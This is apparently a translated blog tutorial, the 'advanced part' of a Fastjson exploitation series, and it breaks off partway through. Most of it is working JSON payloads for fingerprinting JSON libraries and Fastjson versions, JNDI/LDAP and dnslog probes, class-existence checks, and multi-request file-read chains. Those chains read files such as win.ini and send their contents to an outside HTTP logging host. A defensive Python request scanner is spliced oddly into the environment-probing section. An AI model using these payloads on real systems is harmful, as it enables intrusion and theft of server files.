Fastjson Vulnerability Series from Absolute Scratch: Advanced Part (1)
Word count: 2467 · 2025-08-23 18:31:34
Fastjson Exploitation, Advanced Part (1): Complete Guide
0. Preface
This article is the advanced part of the Fastjson exploitation series and covers the following topics:
- Identifying which JSON library is in use
- Determining the Fastjson version
- Probing the server environment
- File read exploitation
- File write exploitation
1. Identifying the JSON library in use
1.1 Fastjson detection methods
1.1.1 dnslog method
{
"@type": "java.net.InetSocketAddress",
"address":,
"val": "rtpmognpiy.dgrh3.cn"
}
or
{
{"@type": "java.net.URL", "val": "http://qvhkmkgcta.dgrh3.cn"}: "a"
}
If a dnslog request is received, the application is using Fastjson.
1.1.2 Parse-behaviour method
{
"ext": "blue",
"name": {"$ref": "$.ext"}
}
If this parses successfully (Fastjson resolves the $ref path), it is Fastjson.
1.2 Jackson detection methods
1.2.1 Float precision-loss method
{"score": 1.1111111111111111111111111111111111111111111111111111111111111}
If a value like 1.1111111111111112 is returned, the library is probably Jackson.
1.2.2 Comment-token method
{"age": 1} /*#W01fh4cker
If no error is raised, it is Jackson.
1.2.3 Single-quote method
{"username": 'admin', "password": 'admin'}
If an error is raised, it is Jackson.
1.3 Gson detection method
1.3.1 Comment-token method
#\r\n
{"score": 1.1}
If this parses normally, it is Gson.
1.4 org.json detection method
{"username": '\r', "password": "admin"}
A specific error message indicates org.json.
1.5 hutool.json detection method
{a:whatever} /*\r\nxxx
If it returns correctly (ideally you can see that the returned value is ), it is hutool.json.
2. Determining the Fastjson version
2.1 When error messages are returned
2.1.1 JSON.parseObject(jsondata, User.class)
- 1.1.15<=version<=1.1.26: syntax error, expect {, actual EOF
- 1.1.27<=version<=1.2.11: syntax error, expect {, actual EOF, pos 9
- 1.2.12<=version<=1.2.24: type not match
- 1.2.25<=version<=2.0.1: type not match. java.lang.AutoCloseable -> org.example.Main$User
- 2.0.1<=version<=2.0.5.graal and 2.0.9<=version<=2.0.12: error, offset 35, char
- 2.0.6<=version<=2.0.7: illegal character
- 2.0.8 and 2.0.13<=version<=2.0.40: the error message shows the version number directly
2.1.2 JSON.parse(jsonData)
- 1.1.15<=version<=1.1.26: syntax error, expect {, actual EOF
- 1.1.27<=version<=1.2.32: syntax error, expect {, actual EOF, pos 0
- 1.2.33<=version<=2.0.40: the error message shows the version number directly
2.2 dnslog method
2.2.1 Detecting 1.1.15<=version<=1.2.24
{
"name": "admin",
"email": "admin",
"content": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://aclarecpsj.dgrh3.cn/POC",
"autoCommit": true
}
}
2.2.2 Detecting 1.2.37<=version<=1.2.83
{
{"@type": "java.net.URL", "val": "http://rpdmvyfajp.dgrh3.cn"}: "aaa"
}
2.2.3 Detecting 1.2.9<=version<=1.2.47
{
"username": {
"@type": "java.net.InetAddress",
"val": "bjmgclhjrs.dgrh3.cn"
},
"password": "admin"
}
2.2.4 Detecting 1.2.10<=version<=1.2.47
[
{
"@type": "java.lang.Class",
"val": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.net.InetSocketAddress",
"address":,
"val": "6m2csu.dnslog.cn"
}
]
2.2.5 Detecting 1.2.9<=version<=1.2.36
{
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.net.URL",
"val": "http://tbqnrzguzp.dgrh3.cn"
}
""
}
2.2.6 Detecting 1.2.37<=version<=1.2.83
Use the same payload as above; the version is in this range if dnslog receives a request.
2.2.7 Detecting 1.2.9<=version<=1.2.83
Set [{
"@type": "java.net.URL",
"val": "http://wobfyhueao.dgrh3.cn"
}]
2.2.8 Detecting version≠(1.2.24 || 1.2.83)
{
"page": {
"pageNumber": 1,
"pageSize": 1,
"zero": {
"@type": "java.lang.Exception",
"@type": "org.XxException"
}
}
}
2.2.9 Detecting 1.2.69<=version<=1.2.83
{
"page": {
"pageNumber": 1,
"pageSize": 1,
"zero": {
"@type": "java.lang.AutoCloseable",
"@type": "java.io.ByteArrayOutputStream"
}
}
}
2.2.10 Detecting 1.2.48<=version<=1.2.83
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl"
}
}
2.2.11 Detecting version=1.2.24
{
"zero": {
"@type": "com.sun.rowset.JdbcRowSetImpl"
}
}
2.3 Delay-based methods
2.3.1 浅蓝's regex DoS (ReDoS) probe (1.2.36<=version<=1.2.63_noneautotype)
{
"regex": {
"$ref": "$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]"
},
"blue": "aaa!"
}
Use with caution: it can impact the business system.
2.3.2 JNDI request delay probe
2.3.2.1 Detecting 1.2.4<=version<=1.2.47
{
"name": {
"\u0040\u0074\u0079\u0070\u0065": "\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073",
"\u0076\u0061\u006c": "\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"
},
"x": {
"\u0040\u0074\u0079\u0070\u0065": "\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c",
"\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065": "ldap://1.2.3.4/test111",
"autoCommit": true
}
}
2.3.2.2 Detecting 1.1.16<=version<=1.2.24
{
"username": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://1.2.3.4/POC",
"autoCommit": true
}
}
2.3.2.3 Variant: detecting 1.1.16<=version<=1.2.11
{
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://1.2.3.4/POC",
"autoCommit": true
}
""
}
2.3.2.4 Detecting 1.2.28<=version<=1.2.47
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://1.2.3.4/POC",
"autoCommit": true
}
}
2.3.2.5 Variant: detecting 1.2.9<=version<=1.2.11
{
"@type": "com.alibaba.fastjson.JSONObject",
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://1.2.3.4/POC",
"autoCommit": true
}
}
2.4 Probing key versions
2.4.1 v1.2.24
Use the delay-based probes described in 2.3.
2.4.2 v1.2.47
{
"username": {
"@type": "java.net.InetSocketAddress",
"address":,
"val": "rylxkswlfg.dgrh3.cn"
}
}
or
[
{
"@type": "java.lang.Class",
"val": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.net.InetSocketAddress",
"address":,
"val": "rylxkswlfg.dgrh3.cn"
}
]
2.4.3 v1.2.68
[
{
"@type": "java.lang.AutoCloseable",
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.net.InetSocketAddress",
"address":,
"val": "mwhajokbdd.dgrh3.cn"
}
]
2.4.4 v1.2.80 and v1.2.83
[
{
"@type": "java.lang.Exception",
"@type": "com.alibaba.fastjson.JSONException",
"x": {
"@type": "java.net.InetSocketAddress",
"address":,
"val": "xfjdbd.dnslog.cn"
}
},
{
"@type": "java.lang.Exception",
"@type": "com.alibaba.fastjson.JSONException",
"message": {
"@type": "java.net.InetSocketAddress",
"address":,
"val": "uawcowbohf.dgrh3.cn"
}
}
]
If the first element triggers a dnslog request and the second does not, the version is 1.2.80; if both trigger requests, the version is 1.2.83.
3. Probing the server environment
3.1 Null-value method
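A defender-side check for the request shapes shown in sections 1 and 2, added here as an example and not part of the original article: it decodes \uXXXX-escaped keys (the trick in 2.3.2.1), flags stacked @type keys, and matches the class names the probes rely on. It works on the raw body rather than a strict JSON parser because Fastjson accepts bodies that json.loads rejects; the sample bodies and the WATCHED_CLASSES set are constructed from this page.

```python
import re

# Class names that appear in the probe payloads on this page. They are used
# only to match incoming request bodies, never to build requests.
WATCHED_CLASSES = frozenset({
    "com.sun.rowset.JdbcRowSetImpl", "java.lang.Class", "java.lang.AutoCloseable",
    "java.net.InetSocketAddress", "java.net.InetAddress", "java.net.Inet4Address",
    "java.net.URL", "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
})
_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_TYPE_KEY = re.compile(r'"@type"\s*:\s*"([^"]*)"')
_VAL_KEY = re.compile(r'"val"\s*:\s*"([^"]*)"')
_REF_KEY = re.compile(r'"\$ref"\s*:\s*"([^"]*)"')
_STACKED_TYPE = re.compile(r'"@type"\s*:\s*"[^"]*"\s*,\s*"@type"\s*:')


def normalize(body: str) -> str:
    """Decode \\uXXXX escapes so an escaped "@type" key reads like a literal one."""
    return _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), body)


def scan(body: str) -> dict:
    """Scan one raw request body; returns the @type count and a list of findings.

    Deliberately works on text rather than json.loads(): fastjson accepts
    bodies a strict parser rejects ("address":, duplicate keys, objects as
    keys), so a detector that parses first would miss exactly those probes.
    """
    text = normalize(body)
    findings = []
    if (text.count('"@type"') > body.count('"@type"')
            or text.count('"$ref"') > body.count('"$ref"')):
        findings.append("control key hidden behind \\u escapes")
    if _STACKED_TYPE.search(text):
        findings.append("stacked @type keys (type-override trick)")
    types = _TYPE_KEY.findall(text)
    findings += [f"@type {c}" for c in types if c in WATCHED_CLASSES]
    findings += [f"val loads {c}" for c in _VAL_KEY.findall(text) if c in WATCHED_CLASSES]
    findings += [f"$ref {r}" for r in _REF_KEY.findall(text)]
    return {"type_keys": len(types), "findings": findings}


# Constructed sample bodies (shapes from this page, with placeholder values).
SAMPLE_BENIGN = '{"username":"admin","score":1.1}'
SAMPLE_REF = '{"ext":"blue","name":{"$ref":"$.ext"}}'
SAMPLE_STACKED = '{"zero":{"@type":"java.lang.AutoCloseable","@type":"java.io.ByteArrayOutputStream"}}'
SAMPLE_ESCAPED = (r'{"n":{"\u0040\u0074\u0079\u0070\u0065":"java.lang.Class",'
                  r'"\u0076\u0061\u006c":"com.sun.rowset.JdbcRowSetImpl"}}')

if __name__ == "__main__":
    for name, body in [("benign", SAMPLE_BENIGN), ("ref", SAMPLE_REF),
                       ("stacked", SAMPLE_STACKED), ("escaped", SAMPLE_ESCAPED)]:
        print(name, scan(body))
```

In practice an application that never needs polymorphic deserialization can simply reject any body with a non-zero type_keys count, regardless of the class named.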
{
"z": {
"@type": "java.lang.Class",
"val": "org.springframework.web.bind.annotation.RequestMapping"
}
}
If the class exists on the target, a class instance is returned; if it does not exist, null is returned.
3.2 dnslog echo method
{
"@type": "java.net.Inet4Address",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "java.util.Locale",
"language": {
"@type": "java.lang.String",
"1": {
"@type": "java.lang.Class",
"val": "com.mysql.jdbc.Driver"
}
},
"country": "aaa.qmc8xj4s.dnslog.pw"
}
}
}
}
Only macOS can ping a domain name that contains curly braces.
3.3 Error echo method
{
"x": {
"@type": "java.lang.Character",
"@type": "java.lang.Class",
"val": "com.mysql.jdbc.Driver"
}
}
4. File reading
4.1 fastjson [1.2.73<=version<=1.2.80]
4.1.1 aspectjtools
4.1.1.1 Direct echo method
Sent as three separate requests:
{"@type": "java.lang.Exception", "@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"}
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [{}]
}
}
}
}
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "c:/windows/win.ini"
},
"password": "admin"
}
Or as a single request:
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "c:/windows/win.ini"
},
"password": "admin"
}
]
}
}
}
}
]
4.1.1.2 Error echo method
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "java.lang.Character",
"c": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "c:/windows/win.ini"
}
},
"password": "admin"
}
]
}
}
}
}
]
4.1.1.3 dnslog echo method (requires the target to be macOS and a dnslog platform that accepts special characters)
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "1.txt"
},
"password": {
"@type": "java.net.Inet4Address",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "java.util.Locale",
"language": {
"@type": "java.lang.String",
"$ref": "$"
},
"country": "aaa.qmc8xj4s.dnslog.pw"
}
}
}
}
}
]
}
}
}
}
]
4.1.1.4 httplog echo method (additionally requires ognl>=2.7 and commons-io>=2.0)
Sent as two requests:
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "test"
},
"password": "admin"
}
]
}
}
}
}
]
{
"su14": {
"@type": "java.lang.Exception",
"@type": "ognl.OgnlException"
},
"su15": {
"@type": "java.lang.Class",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "ognl.OgnlException",
"_evaluation": ""
}
}
},
"su16": {
"@type": "ognl.Evaluation",
"node": {
"@type": "ognl.ASTMethod",
"p": {
"@type": "ognl.OgnlParser",
"stream": {
"@type": "org.apache.commons.io.input.BOMInputStream",
"delegate": {
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "jdk.nashorn.api.scripting.URLReader",
"url": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "java.util.Locale",
"language": "http://127.0.0.1:8085/?test",
"country": {
"@type": "java.lang.String",
[
{
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "C:/Windows/win.ini"
}
]
}
}
}
},
"charsetName": "UTF-8",
"bufferSize": 1024
}
},
"boms": [
{
"@type": "org.apache.commons.io.ByteOrderMark",
"charsetName": "UTF-8",
"bytes": [36]
}
]
}
}
}
},
"su17": {
"$ref": "$.su16.node.p.stream"
},
"su18": {
"$ref": "$.su17.bOM.bytes"
}
}
4.1.2 aspectjtools + xalan (>=2.4.0) + dom4j (any version)
4.1.2.1 Direct echo method
Sent as five requests:
[
{
"@type": "java.lang.Exception",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
},
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits": [
{
"username": {
"@type": "org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "test"
},
"password": "admin"
}
]
}
}
}
}
]
{
"@type": "java.lang.Exception",
"@type": "org.apache.xml.dtm.DTMConfigurationException",
"locator": {}
}
{
"@type": "java.lang.Class",
"val": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "org.apache.xml.dtm.DTMConfigurationException",
"locator": {}
}
}
}
}
{
"su14": {
"@type": "javax.xml.transform.SourceLocator",
"@type": "org.apache.xpath.objects.XNodeSetForDOM",
"nodeIter": {
"@type": "org.apache.xpath.NodeSet"
},
"xctxt": {
"@type": "org.apache.xpath.XPathContext",
}
}
}
4.1.2.2 httplog echo method
Replace the last step with:
{
"@type": "java.io.InputStream",
"@type": "org.apache.commons.io.input.BOMInputStream",
"delegate": {
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "jdk.nashorn.api.scripting.URLReader",
"url": {
"@type": "java.lang.String",
"@type": "java.util.Locale",
"val": {
"@type": "com.alibaba.fastjson.JSONObject",
{
"@type": "java.lang.String",
"@type": "java.util.Locale",
"language": "http://127.0.0.1:8085/?test",
"country": {
"@type": "java.lang.String",
[
{
"@type": "org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName": "C:/Users/whoami/Desktop/testtest.txt"
}
]
}
}
}
},
"charsetName": "UTF-8",
"bufferSize": 1024
},
"boms": [
{
"@type": "org.apache.commons.io.ByteOrderMark",
"charsetName": "UTF-8",
"bytes": [98]
}
]
}
}
4.2 fastjson [1.2.37<=version<=1.2.68]
4.2.1 Original blackhat2021 getBom() technique (limited applicability)
{
"abc": {
"@type": "